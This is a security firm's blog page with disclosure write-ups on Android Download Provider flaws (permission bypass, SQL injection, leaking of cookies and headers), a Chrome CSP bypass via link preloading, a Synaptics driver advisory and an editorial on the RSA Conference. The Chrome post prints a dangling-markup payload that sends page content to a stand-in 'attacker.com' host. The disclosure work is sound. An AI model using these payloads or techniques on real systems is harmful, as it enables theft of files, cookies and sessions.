ADVISORIES | April 1, 2019

Multiple Vulnerabilities in Android’s Download Provider (CVE-2018-9468, CVE-2018-9493, CVE-2018-9546)

Android’s Download Provider is a component of the Android framework and is designed to handle external downloads for other applications, such as web browsers (including Google Chrome), email clients (including Gmail), and the Google Play Store, among many others. In this blog post, I’ll describe three different high-severity vulnerabilities which affected several of the most recent versions of Android.

Android’s Download Provider

Any app can delegate its external downloads through this provider. As a developer, you’ll only need to insert a row with the appropriate parameters (invoking the Download Content Provider, part of the Download Provider, also called Download Manager). The Android Framework will handle the download for you automatically, in a background process which offers different configuration options. The notification with a progress bar that you’ve most likely seen several times (when downloading documents, attachments, or apps, for instance) is related to this provider, as illustrated in the following screenshots.

Overview of Vulnerabilities

By performing a research-driven manual code inspection of the Download Provider, using a very similar approach to the one I took with the Personal Dictionary Provider, I discovered three high-severity vulnerabilities. The following issues were reported to Google, along with their corresponding proof-of-concept tools for exploitation:

CVE-2018-9468: Download Provider Permission Bypass

The Download Provider is secured by different permissions and other protection mechanisms with various levels of access. As a general rule, a regular application should only have access to its own downloads. However, by exploiting this trivial vulnerability, any application (even without any permissions granted at all) can access any download that was requested by any other application or component of the OS itself, through the following content provider URI:

  • content://downloads/public_downloads/#

A malicious application would only need the identifier of a targeted download to gain access to it. This identifier is a sequential number, so all downloads are very easy to locate using a simple iteration. Once an existing download is located, most of the information stored in the provider’s database will be directly accessible through the Download Content Provider, including its title, description, size, full URL, etc. This may leak potentially sensitive information, including authentication tokens in the URL, email addresses, confidential document titles, email subjects found in the title or description columns, and so on.

This is only one of the aspects a malicious app can leverage. Actually, the impact is notably higher, because the openFile() method of the Content Provider is also affected by the vulnerability, since it relies on the query() call to check for permissions. That means that the attacker would also have unrestricted read and write access to the downloaded files. By exploiting this flaw, it’s possible to leak any downloaded file, and even worse, to overwrite it with arbitrary content, even before the download is complete.

This would allow a malicious app to read and potentially exfiltrate all your downloads (think about email attachments, electronic bank statements, or any other file you may download while browsing the Internet), which is obviously pretty bad for your confidentiality and the integrity of your data.

The following video demonstrates how all this data, including file contents, is publicly accessible by any other app. The proof-of-concept exploit just iterates through a range of identifiers, dumps some fields from the internal database, and displays the initial chunk of the downloaded file. The results are limited for brevity and demonstration purposes only, but keep in mind that the entire file would be accessible.

Gmail disclosure

Given the ability to write to these files, a malicious app can run a background service which monitors and overwrites any download requested through Android’s Download Provider. Since the Over-The-Air (OTA) updating process and the Google Play Store also use this provider, a malicious app can constantly overwrite any update or new app your smartphone is downloading, preventing a legitimate user from installing new apps or updating existing ones, including the OS itself, as demonstrated in the following videos.

DoS installing apps
DoS updating apps

In addition, any other downloaded attachment or file could easily be overwritten with arbitrary content using the very same process. This could be abused to replace files that you or your apps may consider trusted (from your bank, company intranet, HTTPS resources, apps using certificate pinning, etc.) to leverage a wide variety of potential exploits, as the downloads can’t be considered trusted anymore. These videos demonstrate the issue using different attack scenarios.

Gmail attachment hijack
Image file hijack
PDF file hijack

The source code and compiled APK for the proof-of-concept application used in these videos can be found in the following GitHub repository:

https://github.com/IOActive/AOSP-DownloadProviderHijacker

CVE-2018-9493: Download Provider SQL Injection

Some columns in the internal database (such as CookieData) are considered private and can’t be accessed directly through the Download Content Provider, unless the caller has unrestricted permissions (the URI is protected by the signatureOrSystem access level).

Specifying any of the restricted columns directly in the projection parameter won’t give us the results, obviously, but exploiting an SQL injection in the where expression, bypassing the setStrict filter, will allow us to extract content from the internal database, including restricted columns for any download. This vulnerability was introduced in 2016 in a change to enable search and filtering capabilities.

Note that this injection can also be combined with the previously described vulnerability (CVE-2018-9468), bypassing the permission’s requirement (by accessing the public_downloads URI, rather than my_downloads). Otherwise, it only requires the INTERNET permission (which isn’t considered dangerous and most apps have) in order to be exploited separately.

The source code and compiled APK for the proof-of-concept application that exploits this vulnerability can be found in the following GitHub repository:

https://github.com/IOActive/AOSP-DownloadProviderDbDumper

CVE-2018-9546: Download Provider Headers Disclosure

Consider an application that requests a download which, apart from the URL, needs some HTTP headers, such as authentication, cookies, or anti-CSRF tokens, for instance. To support this feature, Android’s Download Provider allows developers to request a download with any standard or custom HTTP headers. These headers will be stored in the database and exposed through the Downloads Content Provider, by simply specifying the identifier of the related download.

Unfortunately, Android never checks if you have permission to access the desired rows belonging to the identifier you’re requesting, so all headers of every single download can be trivially dumped by simply iterating through all existing identifiers.

A malicious app only requires the INTERNET permission to gain read access to all these headers. For instance, the default Android Browser app (not the latest versions of Google Chrome) in Android 5.1 stores all HTTP cookies in this table. This could lead to a highly sensitive information leak, allowing an attacker to steal your sessions if you happen to download any file from an authenticated website using that browser, as demonstrated in the following video.

cookie disclosure

The source code and compiled APK for the proof-of-concept application used in the video can be found in the following GitHub repository:

https://github.com/IOActive/AOSP-DownloadProviderHeadersDumper

Remediation

As an Android user, make sure your device is fully patched and never install untrusted apps. These vulnerabilities were fixed in the AOSP patches released on September and October 2018. For different vendors, check their security bulletins to ensure all three CVEs enumerated here are listed as patched.

As a developer, always apply defense-in-depth best practices and never trust a downloaded file that could have been tampered with in transit or at rest, as demonstrated in the videos in this post. Beware of potential race conditions or TOCTOU (Time-of-Check to Time-of-Use) vulnerabilities in your validation process.

Conclusions

It wasn’t hard to find these high-severity vulnerabilities. I discovered them in a few hours, by simply inspecting some source code fragments and understanding a relatively small component of the Android Framework, such as the Download Content Provider.

Whether you are working from a developer’s or a security auditor’s perspective, make sure to identify all entry points, understand the big picture, and pay attention to every detail that might lead to a vulnerability. Most of the time, the problem isn’t in the code that you can read, but in the code that you can’t see because it isn’t there, even though it should be, such as missing validations, permission checks, and so on.

More Information

Find more detailed information in our corresponding security advisories:

IOActive Security Advisory – Android’s Download Provider Permission Bypass (CVE-2018-9468)
IOActive Security Advisory – Android’s Download Provider SQL Injection (CVE-2018-9493)
IOActive Security Advisory – Android’s Download Provider Request Headers Disclosure (CVE-2018-9546)

ADVISORIES |

Android (AOSP) Download Provider Request Headers Disclosure (CVE-2018-9546)

A malicious application with the INTERNET permission granted could retrieve all entries from the Download Provider request headers table.

These headers may include sensitive information, such as session cookies or authentication headers, for any download started from the Android Browser or Google Chrome, among other applications.

Consider the impact that this would have on a user downloading a file from an authenticated website or URL. For example, an electronic statement file from an online bank or an attachment from corporate webmail may allow an attacker to impersonate the user on these platforms.

ADVISORIES |

Android (AOSP) Download Provider Permission Bypass (CVE-2018-9468)

A malicious application without any granted permission could retrieve all entries from the Download Provider, bypassing all currently implemented access control mechanisms. The level of access will be similar to having the ACCESS_ALL_DOWNLOADS permission granted, which is a signature-protected permission.

The information retrieved from this provider may include potentially sensitive information such as file names, descriptions, titles, paths, URLs (that may contain sensitive parameters in the query strings), etc., for applications such as Gmail, Chrome, or the Google Play Store.

ADVISORIES |

Android (AOSP) Download Provider SQL Injection (CVE-2018-9493)

By exploiting an SQL injection vulnerability, a malicious application without any permission granted could retrieve all entries from the Download Provider, bypassing all currently implemented access control mechanisms. Also, applications that were granted limited permissions, such as INTERNET, can also access all database contents from a different URI.

The information retrieved from this provider may include potentially sensitive information such as file names, descriptions, titles, paths, URLs (that may contain sensitive parameters in the query strings), etc., for applications such as Gmail, Chrome, or the Google Play Store.

Further access to the downloaded contents may be possible as well, depending on the permissions granted to the app and files.

EDITORIAL | March 1, 2019

RSA Conference Requires Changes

For many years, IOActive has been hosting our IOAsis event as a refuge from the madness of crowds and marketing pitches. This was a hugely successful event and we appreciate everyone’s support and participation over the years to make it a high-quality “hallway con” in an upscale environment. Last year, we noticed a reduction in the quality of attendance at our event even though there was an increase in overall RSA Conference (RSAC) attendance. We discovered in talking to our clients, friends and peers in the industry that many of them no longer felt the ROI was there to attend given the changes in the conference coupled with the significant impact to their companies’ limited travel budgets (with lodging easily averaging $1,000 per night before taxes and fees).

This exorbitant lodging cost has put the conference out of reach of far too many security practitioners and front-line managers and unfortunately further reduces the quality of this conference and the surrounding events. At IOActive, we believe all things are designed and few things are designed well. This applies to the RSAC just as it applies to a poorly designed product. RSAC has moved from being a conference about cybersecurity to a conference about the companies involved in cybersecurity. While RSAC has always had a heavy product focus with a parade of companies offering whatever marketing has determined to be the magic talisman du jour, it has moved to more of a focus on the acquisition and funding of the companies that make these talismans. This only further removes RSAC from a conference for security practitioners and managers.

We have greatly enjoyed all the fantastic discussion and comaraderie at our past IOAsis events. Much as we evolve our services to meet the changing threatscape, we feel we must evolve our events to meet the changing “conferencescape.” While conferences such as RSAC are no longer focused on practitioners, there are numerous regional, vertical, and topical events that have gained traction over recent years and are filling the void to provide the high-quality content and attendees necessary for a valuable event and associated “hallway con.” With this in mind, we are bidding a fond farewell to our IOAsis at RSAC and will be launching a series of IOAsis events aligned with these more focused events.

We spend quite a bit of time pointing out flaws and vulnerabilities, but we also offer constructive recommendations on how to address the identified issues. First, RSAC could find a more affordable venue to host the conference at this scale. The cost of hotel rooms indicates a dramatic lack of supply in San Francisco for a conference of this size. Second, the acquisition and funding focus could be moved to the week before the cybersecurity events starting on Wednesday or Thursday of the preceding week. This would allow the handful of executives to come in a bit earlier to have a less-rushed interaction with the PE, VC and investment banker communities before they need to focus on their clients and prospects. Lastly, we believe RSAC should focus on cybersecurity rather than simply acting as a showroom for current cybersecurity products. We appreciate running a conference of this size is not easy and these observations are meant to be help improve the quality and help RSAC stay relevant for many years to come.

The IOActive team will still be present at RSA and speaking at several of the surrounding events throughout the week. We look forward to seeing our clients, prospects, friends, family and peers in San Francisco this year. If you would like to see us, please get in touch.

RESEARCH | February 20, 2019

Bypassing Chrome’s CSP with Link Preloading

In this post I’m going talk about a bug I found a while back in Google’s Chrome browser that allows attackers to bypass the Content Security Policy (CSP). Besides breaking the CSP, the bug also allows attackers a means to ex-filtrate information from inside an SSL/TLS connection. The bug was reported a couple of years back and we got word that the fix is in, so I decided to dust off this blog post and update it so you folks can learn about it.

The CSP is a configuration setting communicated to browsers through HTTP. It allows web servers to whitelist sources for active content to help defend against cross-site scripting. The policy is specified in response to resource fetches or any HTTP transaction in general with the host. Here’s what a common CSP looks like:

content-security-policy:
default-src * data: blob:;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' fbstatic-a.akamaihd.net fbcdn-static-b-a.akamaihd.net *.atlassolutions.com blob: data: 'self' *.m-freeway.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com *.fbcdn.net *.facebook.net *.spotilocal.com:* *.akamaihd.net wss://*.facebook.com:* https://fb.scanandcleanlocal.com:* *.atlassolutions.com attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' chrome-extension://boadgeojelhgndaghljhdicfkmllpafd chrome-extension://dliochdbjfkdbacpmhlcpmleaejidimm;

As you can see, the header lists attributes you would like to harden against unauthorized sources. It works by inspecting the browser origin that is sourcing active scripts on a document and making sure they match the ruleset published by the web server.

So that’s how CSP works. Now let’s talk about when it doesn’t work and what kind of response it got from the sec research industry. lcamptuf from Google wrote about developing attacks that do dangerous things to your DOM and your page content, despite the presence of a working CSP. Essentially trying to answer this question:

What will attacks look like should this idea actually work the way it is designed?

Among the techniques that came out of this line of questioning was the idea of “dangling content injection,” a brilliant concept that abuses the aggressively best-effort behavior of browsers. In a dangling content injection attack, you inject a broken HTML tag and rely on the browser to complete this tag by interpreting the content around the broken tag as part of the tag. Essentially injecting by forcing the browser to consume page content as part of an HTML tag, image tag, text area, etc.

Initially, this might seem like a mundane and rather harmless way to break a web page’s functionality, but as it turns out, it could result in security problems. It’s easier to grasp this with an example. Below is a page that fell victim to an HTML injection attack:

An image tag is being injected, and the payload looks like this:

https://[domain]/[path]?query=<img src="http://attacker.com

Because this <img> tag is broken, Chrome will try to fix it for us by consuming adjacent page content as part of the URL and domain name for the <img> tag. Which, as you guessed, means that Chrome will try to use it to resolve a domain name. The only thing spoiling our fun is the CSP; we need a link here that actually allows the DNS resolution to take place using the page content.

The bug I found involves the behavior of the <link> tag. Specifically, what happens in Chrome when a <link rel=’preload’ href=’[URL]’ /> is encountered. These tags are part of the “sub-resource linking mechanisms” in HTML and allow you to link documents together so they can share common sub-resources such as JavaScript, CSS, fonts etc. You can also have the browser preemptively resolve domain names before a page is loaded, which is what the <preload> links are for!

What does this look like in practice? In the following screenshot you can see the DNS traffic generated by a broken preload link tag I injected into an HTTPS secured page; you might notice some HTML keywords in the DNS names:

There you have it, details that were once safely encrypted behind a TLS stream are flying through the air in unencrypted DNS requests! Probably not how you want your browser to work.

Anyway, that’s it for this one folks. Happy hacking!

ADVISORIES | February 1, 2019

Synaptics TouchPad SynTP Driver Leaks Multiple Kernel Addresses

Synaptics TouchPad Windows driver leaks multiple kernel addresses and pointers to unprivileged user mode programs. This could be used by an attacker to bypass Windows Kernel Address Space Layout Randomization (KASLR).
(CVE-2018-15532)